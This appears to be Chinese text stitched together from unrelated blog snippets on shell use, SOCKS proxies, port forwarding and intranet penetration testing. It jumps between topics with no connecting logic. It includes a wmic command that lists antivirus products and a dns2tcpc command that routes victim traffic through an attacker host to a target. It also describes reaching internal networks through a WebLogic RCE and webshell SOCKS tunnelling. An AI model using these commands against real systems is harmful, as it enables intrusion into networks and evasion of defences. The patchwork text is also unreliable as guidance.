软件开发过程中经常我们可能会感叹或佩服某个大神或牛人多少得厉害强大。其中可能就存在大神或牛人对Linux或Mac操作系统的Shell的精通熟练。学习好Shell和用好Shell的确可以提升我们的开发效率。解决我们工作中的繁琐问题。一条Shell可能解决了我们写大量代码的问题。
然后你就可以在浏览器中或其他支持socks5代理的软件中进行设置。ssh client 和 ssh server 是同一台机器,并充当socks5代理:{you} — {ssh client / ssh server} — {other hosts}。
网络的shell脚本,此脚本是从EZHTTP拆分出来的,觉得有必要单独介绍下。如果ESTABLISED非常大,但通过日志发现没有那么多请求,或者通过tcpdump发现大量ip只建立连接不请求数据的话,可能是受到了全连接攻击,这时候如果你使用的是nginx服务器,可以在配置文件增加listen 80 deferred来防止。
端口转发,也有人叫端口反弹,简单的很,总结了10个端口转发小技巧,其实就是A能访问B,B能访问C,但是A不能访问C,端口转发就是让A能访问C,举个不恰当的例子:情景:小黑能够访问和控制跳板机,跳板机能访问手机。
需要知道,在渗透的整个流程中,根据web应用或者开放的端口进行渗透,获取webshell只是渗透这门艺术的一小部分,在真实的错综复杂的企业环境中进行内网渗透,其实水很深,涉及内网穿透,端口转发,域渗透,提权等一系列的难题。
wmic /node:localhost /namespace:\\root\securitycenter2 path antivirusproduct get displayname /format:list查杀软。
要沿路由受害者:4444 → 攻击者 → 目标:5555 转发流量,请使用以下参数运行实用程序:victim$> dns2tcpc.exe -z attacker.tk -k s3cr3t -t 3 -L 4444:target:5555 8.8.8.8。
若确实需要下载在其它位置,那么也可以去官网进行下载,同时在官网中还附带相应的官方手册。官网:Metasploit Unleashed - Free Online Ethical Hacking Course | OffSec。
三级代理:内网主机 A 没有公网 IP ,但是可以访问外网,内网主机 B 不能访问外网,但是可以和 A 相互访问,内网主机 C 能访问内网资源,但是只能和 B 相互访问,我们如果想访问内网资源就需要做三层代理。在内网主机 A 上,将 VPS 的 4444 端口和内网主机 B 的 5555 端口连接起来。
好在运气不错,通过weblogic的反序列化RCE拿到系统权限,后来发现了一个尴尬的问题,目标主机不出网,借助搜索引擎,大佬们都在用reGeorgh和Pystinger,这两款工具都是使用webshell来进行socks代理,进而穿透内网,后面确实也达到目的,进内网水了波分。
